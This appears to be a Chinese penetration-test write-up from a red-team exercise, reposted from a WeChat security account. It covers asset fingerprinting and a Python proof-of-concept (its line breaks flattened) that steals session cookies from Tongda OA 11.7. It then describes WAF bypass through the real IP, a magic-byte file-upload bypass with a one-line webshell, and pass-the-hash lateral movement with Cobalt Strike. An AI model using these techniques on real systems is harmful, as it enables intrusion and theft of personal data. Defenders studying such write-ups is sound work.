记一次外网打点到内网横向
2023-1-12 08:1:32 Author: Ms08067安全实验室(查看原文) 阅读量:22 收藏

本文来自“白帽子社区知识星球”

作者:BaiKer

记录hw中的一次打点经历,感觉拿的挺偏的,也算是靠运气 

不过也算是一种思路吧,给大家分享一下

01
指纹探测

通过指纹探测工具对目标进行批量扫描 

然后罗列出重点资产,优先测试

Ehole.exe -l file.txt -json out.json

02
登录后台

通过指纹探测,发现某一个网站使用了通达OA

然后对该网站检测所有的 n day

然后发现该网站存在 通达OA v11.7 在线用户登录漏洞 1 Ehole.exe -l file.txt -json out.json 这个漏洞吧,虽然是个漏洞,但是一直没有多大用处 因为利用条件很难,需要你不断的监控,正好目标用户处于登录状态才可以 不过既然发现了,那就先挂在服务器上用脚本跑着,万一出结果呢 

poc如下:

import requestsimport sysimport reimport timedef poc(url,uid):url = f'{url}/mobile/auth_mobi.php?isAvatar=1&uid={uid}&P_VER=0'while True:res = requests.get(url)if res.status_code == 200:if res.text == '':cookies = re.findall(r'PHPSESSID=(.*?);', str(res.headers))print('[+]目标在线,PHPSESSID=' + cookies[0])breakif 'RELOGIN' in res.text:print('[+]目标用户不在线')time.sleep(2)def main(argv):print('------------------------------------------')print('[+]适用版本:通达OA 11.7 ')print('[+]使用格式: python3 poc.py url uid')print('------------------------------------------')poc(argv[0],argv[1])if __name__ == '__main__':main(sys.argv[1:])

注:图是后面用另一个脚本临时补的,之前写的这个不知道放哪里了 

后来想着一直等着不是这么回事,中间也没发现其他的入口,然后发现目标网站是我们客户的网 站,这不是巧了 

找了队友说了一下想法,商量了一个理由,然后联系那边的运维同学,找客户相关的人联系了一下 (其实那个号就在他手里,装一下) 

啪!上线!

03
WAF bypass

上面这个漏洞吧,因为需要访问特定的url路径,然后就被云WAF拦截了

当天的网站关掉了,随便找了个截图的... 这里主要是通过真实IP去绕 

这里说了一下思路,一个是通过域名或者被测单位名称或者网站标题放到 fofa 去搜 

还一个是查找子域,然后通过子域里在省内IP的,去扫描C段 

然后修改hosts刷新DNS解析去判断真实IP 

日常中第一个方法就可以了,如果没有就直接放弃,或者使用其他方式绕WAF 

第二种是个笨办法,可以用go写个工具去实现,但是量可能会比较大

04
文件上传

进去后台大概过了一下,好像没什么东西 大概有几万的敏感数据,身份证信息,电话号什么的,报了一个信息泄露,因为量大,

有额外的 分,美滋滋,继续测试 抓了几个包,测了一下,没有SQL注入,放弃了 

然后找到了一个文件上传的地方,不过被后端拦掉了 

后端检测上传文件的头部是不是图片格式 

大概绕过原理如下 

要绕过jpg文件幻数检测就要在文件开头写上下图的值: 

Value = FF D8 FF E0 00 10 4A 46 49 46

要绕过gif 文件幻数检测就要在文件开头写上下图的值 Value = 47 49 46 38 39 61

要绕过png 文件幻数检测就要在文件开头写上下面的值 Value = 89 50 4E 47

然后在文件头部后面加上自己的一句话木马代码就行了 直接简单一点

copy image.jpg/b+test.php/a test.jpg
05
哈希传递

内网不麻烦,就是耗时间一个个去磨 

这次环境没有域,全是工作组,也挺无聊的 

说一个最常见的方式吧 通过shell上线CS后 

先是扫描内网中存活的IP,直接是使用CS也好,利用原生命令也好,代理流量通过各种工具扫描也好,目的就是一个,探测更多的资产,拓展C段和其他IP段 

这里通过CS扫描了C段,发现一百多个存活的主机 然后通过哈希传递的方式,利用本地Hash去撞其他主机 因为内网中主机使用同一个密码的可能性很大 

而且不得不说,利用CS进行哈希传递太简单了,不用那么麻烦 

大概下图这样子,一百多个主机看运气能拿十几个二十几个吧,然后弱口令也可以试一试 

然后就和外网打点那样子,扫一扫端口,找漏洞拿shell,然后再抓hash去撞 Linux的话,主要是通过SSH。

不过特别麻烦,而且基本上每台主机都需要提权


文章来源: http://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247505805&idx=3&sn=faf7f5425738ce9edc8810fb2c187af7&chksm=fc3c6e8ccb4be79ab9cbdb7645abc0ca39376177b7834791c4b28788d5d4a37a5f522d4b04ef#rd
如有侵权请联系:admin#unsafe.sh